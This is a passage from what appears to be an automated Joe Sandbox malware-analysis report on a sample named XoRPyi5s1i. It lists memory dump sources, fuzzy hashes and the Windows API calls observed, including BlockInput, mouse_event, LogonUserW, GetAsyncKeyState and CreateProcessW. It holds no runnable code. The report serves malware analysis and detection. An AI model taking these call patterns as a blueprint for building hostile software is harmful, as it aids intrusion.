                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: b47b45b774f701246508c4551b1e17d4f19d43d227a4d72840d56cdf726c4657
                                    • Instruction ID: 7f40a2b52fe716ce618e282ce2d3f41ae5582bc18d1e1526889a23c9604dbdac
                                    • Opcode Fuzzy Hash: b47b45b774f701246508c4551b1e17d4f19d43d227a4d72840d56cdf726c4657
                                    • Instruction Fuzzy Hash: 19E0C230104219BBEF2C0F09EC1AFB93F28EB00B50F108229F95BD84E0E7B098D1D660
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00156DB3,-0000031A,?,?,00000001), ref: 001581B1
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 001581BA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 3138dc51dfe9fade7e833db4c95b460606c54696464fa56328970a45c3575e37
                                    • Instruction ID: 76c91d2dab12d0fa8f6e2b638ebde9307b808e6ca4f9ed2fbb9c74fe29065633
                                    • Opcode Fuzzy Hash: 3138dc51dfe9fade7e833db4c95b460606c54696464fa56328970a45c3575e37
                                    • Instruction Fuzzy Hash: E4B092B1044608ABDB042BA1FC0AB587FA8FB08652F044120F60D44872AB7354908B92
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 23308322fe17d502c3bfd270103535fb451083646484aab8905d9ef077706fe6
                                    • Instruction ID: d549372d08a655ae94db074f27f7cae1bf5a6df5a3e8a05de1935ccd9dc0c2b7
                                    • Opcode Fuzzy Hash: 23308322fe17d502c3bfd270103535fb451083646484aab8905d9ef077706fe6
                                    • Instruction Fuzzy Hash: 2BA23BB4E04219DFDB28CF58C4806EDBBB1FF49314F2681A9E859AB391D7349E81DB50
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1aaa0ac6240d97c9f7d138a51f000f6604fb9a90d5aa76ef15d777f188584f38
                                    • Instruction ID: f17c8894790542ae71e96646ae76005018da88d1d91ad4edecdd7b8e6f1a1811
                                    • Opcode Fuzzy Hash: 1aaa0ac6240d97c9f7d138a51f000f6604fb9a90d5aa76ef15d777f188584f38
                                    • Instruction Fuzzy Hash: 07320422D29F018ED7239634D862335A698AFB73D5F15D727E829B9DA6DF29C4C34200
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __itow__swprintf
                                    • String ID:
                                    • API String ID: 674341424-0
                                    • Opcode ID: ae0b278071b3c3fe8334b35d452e80624851a6e2aaad8da934f050f5edec99bb
                                    • Instruction ID: 1810ee76806222e364eaf812219c94fef48159a322d9eed8b2cb15bafaa8dec7
                                    • Opcode Fuzzy Hash: ae0b278071b3c3fe8334b35d452e80624851a6e2aaad8da934f050f5edec99bb
                                    • Instruction Fuzzy Hash: 7622CA716083019FD728DF24C891B6FB7E4BF95314F10492DF89A9B2A1DBB1E944CB92
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ca8b6b5a563b2535c662f75579a50c2cda58e5a1fba441676e6855be3d749513
                                    • Instruction ID: 7637f88278b0f866aecf30603ea3f983a8f03c02f54a69be524a933514b17686
                                    • Opcode Fuzzy Hash: ca8b6b5a563b2535c662f75579a50c2cda58e5a1fba441676e6855be3d749513
                                    • Instruction Fuzzy Hash: 36B1E320D2AF414DD32396398831336BA5DAFBB2D5F91D71BFC1AB4D22EB2195D34180
                                    APIs
                                    • __time64.LIBCMT ref: 0017B6DF
                                      • Part of subcall function 0015344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0017BDC3,00000000,?,?,?,?,0017BF70,00000000,?), ref: 00153453
                                      • Part of subcall function 0015344A: __aulldiv.LIBCMT ref: 00153473
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    • Opcode ID: 3377b3f4c9eca5aa68d9b041e3ffb8dd6777608b48a47eedf7ea10b4f5a0d012
                                    • Instruction ID: 163fe7038f21758aeff3789cf78dbf4aa1c6b6b4f5f7d813ef212c74c3f7bf69
                                    • Opcode Fuzzy Hash: 3377b3f4c9eca5aa68d9b041e3ffb8dd6777608b48a47eedf7ea10b4f5a0d012
                                    • Instruction Fuzzy Hash: 3C217F76634510CBC729CF28C881BA2B7E1EB95310B248E6DE4E9CF2C0CB74BA45DB54
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 001A04F4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 80fc72a1c55df5af7d50c28629b0059b0843ef605448d0c9e2e4824ba028d081
                                    • Instruction ID: 5d95b931b15b993cdea2662e75b46b379ca873eb797e67dbe899d653aa63c380
                                    • Opcode Fuzzy Hash: 80fc72a1c55df5af7d50c28629b0059b0843ef605448d0c9e2e4824ba028d081
                                    • Instruction Fuzzy Hash: 4A110A74204215BAFF2A9A28DD15F793614AB4FB30F208314FA125A5D2CBA45D409264
                                    APIs
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,001AE467,?,?,?,?,00000000,?), ref: 001A0127
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 006e0eb6992f48b1a9f325a81a4ba5a3488b4053a59a1b6620f831ae61834f67
                                    • Instruction ID: 8c0fadf619988b57687277e63c9fc4e40050220aadc16ec8771cc4abb0114a9b
                                    • Opcode Fuzzy Hash: 006e0eb6992f48b1a9f325a81a4ba5a3488b4053a59a1b6620f831ae61834f67
                                    • Instruction Fuzzy Hash: A101D479600118ABDF199F24DC4ABF93BA2EF4E370F184129FA5957192C375EC60D7A0
                                    APIs
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0019E9F5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$CallLongProc
                                    • String ID:
                                    • API String ID: 4084987330-0
                                    • Opcode ID: 0a169d8331c6a934cd73746efe45496b6b716662373498a2f14bda20e17a5541
                                    • Instruction ID: c63077858e9f76027deb512a3f51fdf6f64b5a48f59901ccc6086ee90682bbc8
                                    • Opcode Fuzzy Hash: 0a169d8331c6a934cd73746efe45496b6b716662373498a2f14bda20e17a5541
                                    • Instruction Fuzzy Hash: 8DF0C435104109EF8F19DF95EC449B93BAAFB08364B048115FA159B6A1DB72E8A0EB90
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                      • Part of subcall function 0014B63C: GetCursorPos.USER32(000000FF), ref: 0014B64F
                                      • Part of subcall function 0014B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0014B66C
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000001), ref: 0014B691
                                      • Part of subcall function 0014B63C: GetAsyncKeyState.USER32(00000002), ref: 0014B69F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,001AE514,?,?,?,?,?,00000001,?), ref: 0019ECCA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                    • String ID:
                                    • API String ID: 2356834413-0
                                    • Opcode ID: 6ea0d6d7a9a96979986a46d8bfcb821e75addcba0451ab581c3e677aa25d37cf
                                    • Instruction ID: 47e27563c90041c4ff8711dbe095a4aad8d7029ee74fc9ebef9b2610b4a21e43
                                    • Opcode Fuzzy Hash: 6ea0d6d7a9a96979986a46d8bfcb821e75addcba0451ab581c3e677aa25d37cf
                                    • Instruction Fuzzy Hash: FDF0A730200228FBDF189F05DC06EBE3BA5EB00760F004415F9451A2A1C7B598B0DBD0
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 0014AB45
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: d87b3f7fd28392d823b65b11f94f2cac89a46ede28e7e4c0b9a610353bb34ab6
                                    • Instruction ID: 363d7effc0abb59335bee3190e959a6754c443ff606c1608ae569b3e0ed99dd6
                                    • Opcode Fuzzy Hash: d87b3f7fd28392d823b65b11f94f2cac89a46ede28e7e4c0b9a610353bb34ab6
                                    • Instruction Fuzzy Hash: 92F05834600209EFDB289F09EC55A793BA6FB44360F054229F9128B6B0E7B2D8A0DB50
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 00186ACA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: 1ab8af3451f513712371ca045d1c8af5c37dd920934815be3a2d6bbcd0a8150c
                                    • Instruction ID: b712958fe156373d98cd45799c96d7c2b2918a11743e36d611843745ce940bcd
                                    • Opcode Fuzzy Hash: 1ab8af3451f513712371ca045d1c8af5c37dd920934815be3a2d6bbcd0a8150c
                                    • Instruction Fuzzy Hash: 66E048356002046FC704EF59E405D56B7ECAF74751F04C416F945D7251DBB0F8448BA0
                                    APIs
                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001774DE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID:
                                    • API String ID: 2434400541-0
                                    • Opcode ID: 58577358b2e88fd7bdd822fa2f2a5313b2ccdb923249ae39016d1051ecc80dba
                                    • Instruction ID: 3ed416d7a3a0cef37d526d9390f45e58228b5585b62e60354312c53a80659a6e
                                    • Opcode Fuzzy Hash: 58577358b2e88fd7bdd822fa2f2a5313b2ccdb923249ae39016d1051ecc80dba
                                    • Instruction Fuzzy Hash: 58D09EA556C70579ED3D07249C1FF761968F3007C5F95D2C9B68BC94C1BB9058859132
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0019F649
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 60266e06be8d94022939c6b181c1f315adb0e9a7477376642b90fab4b0babb5e
                                    • Instruction ID: 79e5afb659e07eb3052800d1750d73c34a4e5f3532299b7dae875b1e8ba5b51e
                                    • Opcode Fuzzy Hash: 60266e06be8d94022939c6b181c1f315adb0e9a7477376642b90fab4b0babb5e
                                    • Instruction Fuzzy Hash: 98F06D31201389BFDF21DF58DC15FD67BA9EB16720F144008BA11672E1CBB07860DB60
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0014AB7D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 6f9376d251e78f53df94e765bf83fa6d90663ee93c3f09bf3409deaec3db1fe4
                                    • Instruction ID: f1ad284dca1ee51a0dc01b863ada910e9aba991b84c6aed4cc47fc4923fc6f90
                                    • Opcode Fuzzy Hash: 6f9376d251e78f53df94e765bf83fa6d90663ee93c3f09bf3409deaec3db1fe4
                                    • Instruction Fuzzy Hash: 3BE01235644208FBCF19AF91DC51E683B2AFF58324F104058FA055B6B1CB77A562DB50
                                    APIs
                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0016AD3E), ref: 0016B124
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LogonUser
                                    • String ID:
                                    • API String ID: 1244722697-0
                                    • Opcode ID: a4057525ea25ac825795a9765e39b26a9ff4193518742efe9f0b4b02f067b1cc
                                    • Instruction ID: 18010eee13d07bc94c43d9e18d0c68b967253c3fce91405bc6866b7e2d75a700
                                    • Opcode Fuzzy Hash: a4057525ea25ac825795a9765e39b26a9ff4193518742efe9f0b4b02f067b1cc
                                    • Instruction Fuzzy Hash: EBD05E320A460EAEDF025FA4EC02EAE3F6AEB04700F408110FA11C50A0C771D531AB50
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,001AE4D1,?,?,?,?,?,?), ref: 0019F67F
                                      • Part of subcall function 0019E32E: _memset.LIBCMT ref: 0019E33D
                                      • Part of subcall function 0019E32E: _memset.LIBCMT ref: 0019E34C
                                      • Part of subcall function 0019E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001F3D00,001F3D44), ref: 0019E37B
                                      • Part of subcall function 0019E32E: CloseHandle.KERNEL32 ref: 0019E38D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
